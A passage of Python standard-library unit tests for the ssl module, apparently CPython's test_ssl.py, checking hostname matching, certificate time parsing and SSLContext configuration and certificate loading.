s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
@ignore_deprecation
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# a wildcard in the first fragment combined with IDNA A-labels in subsequent
# fragments is not supported (partial wildcards in the leftmost label are rejected).
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if socket_helper.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if socket_helper.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (RFC 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = socket_helper.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
def test_read_write_zero(self):
# empty reads and writes now work, bpo-42854, bpo-31711
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.send(b""), 0)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.protocol, protocol)
with warnings_helper.check_warnings():
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT |
OP_IGNORE_UNEXPECTED_EOF)
self.assertEqual(default, ctx.options)
with warnings_helper.check_warnings():
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
with warnings_helper.check_warnings():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
def test_verify_mode_protocol(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@ignore_deprecation
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(
hasattr(ssl.SSLContext, 'security_level'),
"requires OpenSSL >= 1.1.0"
)
def test_security_level(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# The default security callback allows for levels between 0 and 5.
# OpenSSL defaults to 1, but some vendors override the default
# value (e.g. Debian defaults to 2).
security_level_range = {
0,
1, # OpenSSL default
2, # Debian
3,
4,
5,
}
self.assertIn(ctx.security_level, security_level_range)
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
ctx.verify_flags = ssl.VERIFY_ALLOW_PROXY_CERTS
self.assertEqual(ctx.verify_flags, ssl.VERIFY_ALLOW_PROXY_CERTS)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# OpenSSL has a fixed limit on the password buffer;
# PEM_BUFSIZE is generally set to 1kb.
# Pass a password larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
